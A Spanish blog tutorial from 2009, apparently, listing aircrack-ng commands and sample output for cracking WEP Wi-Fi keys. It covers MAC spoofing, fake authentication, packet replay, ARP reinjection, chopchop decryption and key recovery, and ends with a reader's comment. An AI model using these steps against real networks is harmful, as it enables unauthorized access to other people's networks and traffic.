--------------------------------------------------------------------------------
Pasos:
1- Parar la tarjeta para poder fijarla en modo monitor. (En el caso de que tu tarjeta se llame eth1, tienes que saber cómo se llama tu tarjeta)
- airmon-ng stop eth1
- ifconfig eth1 down
- macchanger --mac 00:11:22:33:44:55 eth1
- airmon-ng start eth1
- airodump-ng eth1
- airodump-ng -c (canal) -w (nombre de archivo) --bssid (bssid) eth1
---------------------------------------------------------------------------------------------------------------------------------------------------------
Existe un simple test de inyección para saber que ataque funciona. Si quieren ahorrar tiempo, utilízenlo.
Yo nunca utilizo este test, he visto que falla. Hacen falta dos tarjetas para poder llevarlo a cabo. Una que inyecte y otra que recibe.
Se usa así:
- aireplay-ng -9 -e (Nombre de la red) -a (Mac del punto de acceso) -i eth2 eth1
TIPOS DE ATAQUES
1- Falsa autentificación.
Recomiendo usar una dirección mac falsa cuando no hay clientes conectados (00:11:22:33:44:55).
Si hay clientes conectados se puede usar la dirección mac del cliente.
- aireplay-ng -1 0 -e (nombre de la red) -a (El bssid) -h (Nuestra tarjeta mac o la del cliente conectado) eth1
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)
Algunos routers piden reauntificiación cada 30 segundos. Para ello, escribimos:
- aireplay-ng -1 30 -e (nombre de la red) -a (El bssid) -h (La mac) eth1
---------------------------------------------------------------------------------------------------------------------------------------------------------
2- Reenvio interactivo de paquetes.
Este ataque te permite elegir un paquete dado para reenviarlo.
A veces proporciona resultados más efectivos que la reinyección automática de ARP (ataque 3).
- aireplay-ng -2 -b (El bssid) -n 100 -p 0841 -h (Nuestra Mac o la del cliente) -c FF:FF:FF:FF:FF:FF eth1
---------------------------------------------------------------------------------------------------------------------------------------------------------
3- Reinyección automática de ARP
Este ataque es el mas efectivo para generar nuevos IVs, y funciona de forma muy eficaz. A lo mejor habrá que esperar unos minutos para que aparezca una petición ARP.
Tengan en cuenta que este ataque fallará si no hay clientes ascociados.
- aireplay-ng -3 -b (El bssid) -h (Nuestra Mac o la del cliente) eth1
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...
---------------------------------------------------------------------------------------------------------------------------------------------------------
-4 Chopchop (predicción de CRC)
Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave.
1. Primero, desencriptemos un paquete:
- aireplay -4 -h (Nuestra Mac o la del cliente) eth1
- tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
3. Ahora, forjemos una petición ARP.
La IP inicial no importa (192.168.1.100), pero la Ip de destino (192.168.1.2) debe responder a peticiones ARP. La dirección MAC inicial debe corresponder a una estación asociada.
- ./arpforge replay_dec-0627-022301.xor 1 (El bssid) (La Mac del cliente) 192.168.1.100 192.168.1.2 arp.cap
- aireplay-ng -2 -r arp.cap eth1
-5 Obtener la clave con aircrack
Primero hay que copiar el nombre del archivo de captura. Las capturas se guarden en "HOME".
El número de paquetes necesarios para obtener la clave WEP es muy variado. Yo recomiendo unos 250.000. Ve probando a medida que vayas obteniendo paquetes.
Si tienes Backtrack 2 o inferior, tendrás que hacer la desencriptación de éste modo:
- Aircrack-ng (Nombre del archivo).cap
- Aircrack-ng -z (Nombre del archivo).cap
*Disclaimer: Educational purposes meant with this tutorial
*Tutorial by: Monzi_sez
30 octubre 2009
30 octubre 2009
Bien bien, por fin terminaste con tu tuto, XD.
ResponderEliminarAunque veo fallitos, ;).[shhhhh!!!! me callo, me callo...,XD] Pero en general está ¡muy bien!
Satisfecho, :D